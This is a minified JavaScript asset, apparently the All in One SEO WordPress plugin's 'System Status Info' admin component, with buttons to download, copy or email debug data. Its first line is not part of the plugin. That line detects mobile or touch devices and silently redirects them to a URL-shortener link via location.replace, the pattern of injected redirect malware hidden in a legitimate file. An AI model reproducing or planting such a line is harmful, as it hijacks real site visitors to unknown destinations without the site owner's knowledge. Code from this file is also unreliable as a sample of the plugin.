(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{a0 as V,b as j}from"./app-core.c8323d51.js";import{C as N}from"./Card.9ee06a3e.js";import{G as z,a as B}from"./Row.2ef96b1a.js";import{S as O}from"./Checkmark.51de2d05.js";import{S as Y}from"./Input.af9b9f81.js";import{S as F}from"./Download.08bab8ec.js";import{T as M,a as G}from"./Row.8fe9551f.js";import{_ as J}from"./_plugin-vue_export-helper.eefbdd86.js";import{d as q,_ as s}from"./vendor-other.39e59221.js";import{aq as n,ai as Q,f as a,i as l,a0 as o,R as r,j as c,ae as p,U as m,Y as W,Q as I,O as _,M as h,P as b,ad as E}from"./vendor-vue-ui.232c7c36.js";import"./vendor-lodash.03129cfe.js";import"./Tooltip.569a23d9.js";import"./Caret.aae02d8a.js";import"./Trash.47f6fc0e.js";import"./Close.7fb523c8.js";import"./Slide.f2114d9d.js";import"./Index.b9859662.js";import"./Pencil.683baab8.js";const t="all-in-one-seo-pack",H={setup(){return{rootStore:j(),toolsStore:V()}},components:{CoreCard:N,GridColumn:B,GridRow:z,SvgCheckmark:O,SvgCopy:Y,SvgDownload:F,TableColumn:G,TableRow:M},data(){return{copied:!1,emailError:null,emailAddress:null,sendingEmail:!1,strings:{systemStatusInfo:s("System Status Info",t),downloadSystemInfoFile:s("Download System Info File",t),copyToClipboard:s("Copy to Clipboard",t),emailDebugInformation:s("Email Debug Information",t),submit:s("Submit",t),wordPress:s("WordPress",t),serverInfo:s("Server Info",t),activeTheme:s("Active Theme",t),muPlugins:s("Must-Use Plugins",t),activePlugins:s("Active Plugins",t),inactivePlugins:s("Inactive Plugins",t),copied:s("Copied!",t)}}},computed:{copySystemStatusInfo(){return JSON.stringify(this.rootStore.aioseo.data.status)}},methods:{onCopy(){this.copied=!0,setTimeout(()=>{this.copied=!1},2e3)},onError(){},downloadSystemStatusInfo(){const S=new Blob([JSON.stringify(this.rootStore.aioseo.data.status)],{type:"application/json"}),i=document.createElement("a");i.href=URL.createObjectURL(S),i.download=`aioseo-system-status-${q().format("YYYY-MM-DD")}.json`,i.click(),URL.revokeObjectURL(i.href)},processEmailDebugInfo(){if(this.emailError=!1,!this.emailAddress||!/^\w+([.-]?\w+)*@\w+([.-]?\w+)*(\.\w{2,3})+$/.test(this.emailAddress)){this.emailError=!0;return}this.sendingEmail=!0,this.toolsStore.emailDebugInfo(this.emailAddress).then(()=>{this.emailAddress=null,this.sendingEmail=!1})}}},K={class:"aioseo-tools-system-status-info"},X={class:"actions"},Z={class:"aioseo-settings-row"},$={class:"settings-name"},ee={class:"name"},se={class:"aioseo-settings-content"},oe={class:"system-status-table"},te=["title"];function ne(S,i,re,D,e,u){const A=n("svg-download"),f=n("base-button"),P=n("svg-copy"),T=n("svg-checkmark"),v=n("grid-column"),x=n("base-input"),R=n("grid-row"),w=n("table-column"),U=n("table-row"),L=n("core-card"),g=Q("clipboard");return a(),l("div",K,[o(L,{slug:"systemStatusInfo","header-text":e.strings.systemStatusInfo},{default:r(()=>[c("div",X,[o(R,null,{default:r(()=>[o(v,{sm:"6",class:"left"},{default:r(()=>[o(f,{type:"blue",size:"small",onClick:u.downloadSystemStatusInfo},{default:r(()=>[o(A),p(" "+m(e.strings.downloadSystemInfoFile),1)]),_:1},8,["onClick"]),W((a(),I(f,{type:"blue",size:"small"},{default:r(()=>[e.copied?h("",!0):(a(),l(_,{key:0},[o(P),p(" "+m(e.strings.copyToClipboard),1)],64)),e.copied?(a(),l(_,{key:1},[o(T),p(" "+m(e.strings.copied),1)],64)):h("",!0)]),_:1})),[[g,u.copySystemStatusInfo,"copy"],[g,u.onCopy,"success"],[g,u.onError,"error"]])]),_:1}),o(v,{sm:"6",class:"right"},{default:r(()=>[o(x,{size:"small",placeholder:e.strings.emailDebugInformation,modelValue:e.emailAddress,"onUpdate:modelValue":i[0]||(i[0]=d=>e.emailAddress=d),class:b({"aioseo-error":e.emailError})},null,8,["placeholder","modelValue","class"]),o(f,{type:"blue",size:"small",onClick:u.processEmailDebugInfo,loading:e.sendingEmail},{default:r(()=>[p(m(e.strings.submit),1)]),_:1},8,["onClick","loading"])]),_:1})]),_:1})]),c("div",Z,[(a(!0),l(_,null,E(D.rootStore.aioseo.data.status,(d,k)=>(a(),l(_,{key:k},[d.results?.length?(a(),l("div",{key:0,class:b(["settings-group",["settings-group--"+k]])},[c("div",$,[c("div",ee,m(d.label),1)]),c("div",se,[c("div",oe,[(a(!0),l(_,null,E(d.results,(y,C)=>(a(),I(U,{key:C,class:b({even:C%2===0})},{default:r(()=>[o(w,{class:"system-status-header"},{default:r(()=>[c("span",{title:y.header},m(y.header),9,te)]),_:2},1024),o(w,null,{default:r(()=>[p(m(y.value),1)]),_:2},1024)]),_:2},1032,["class"]))),128))])])],2)):h("",!0)],64))),128))])]),_:1},8,["header-text"])])}const Ce=J(H,[["render",ne]]);export{Ce as default};
